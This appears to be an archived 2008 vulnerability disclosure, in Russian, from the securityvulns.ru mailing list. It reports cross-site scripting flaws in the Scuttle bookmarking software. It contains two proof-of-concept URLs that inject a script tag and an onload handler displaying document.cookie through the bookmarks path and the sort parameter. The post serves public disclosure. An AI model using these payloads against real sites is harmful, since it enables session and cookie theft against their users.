Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  IBM Quickr 8 Calendar Xss Injection (Bypass Quickr 8.0 Xss Filter)

  [SECURITY] [DSA 1502-1] New wordpress packages fix multiple vulnerabilities

  phpechocms v 2.0 rc3 RFI

  CastleCops Six Years Old

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:24.02.2008
Subject:Vulnerabilities in Scuttle

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в Scuttle.

Уязвимости в разделе bookmarks и в скрипте index.php в параметре sort.

XSS:

http://site/bookmarks/%3CBODY%20onload=alert(document.
cookie)%3E

http://site/?sort=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1616/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 



Рейтинг@Mail.ru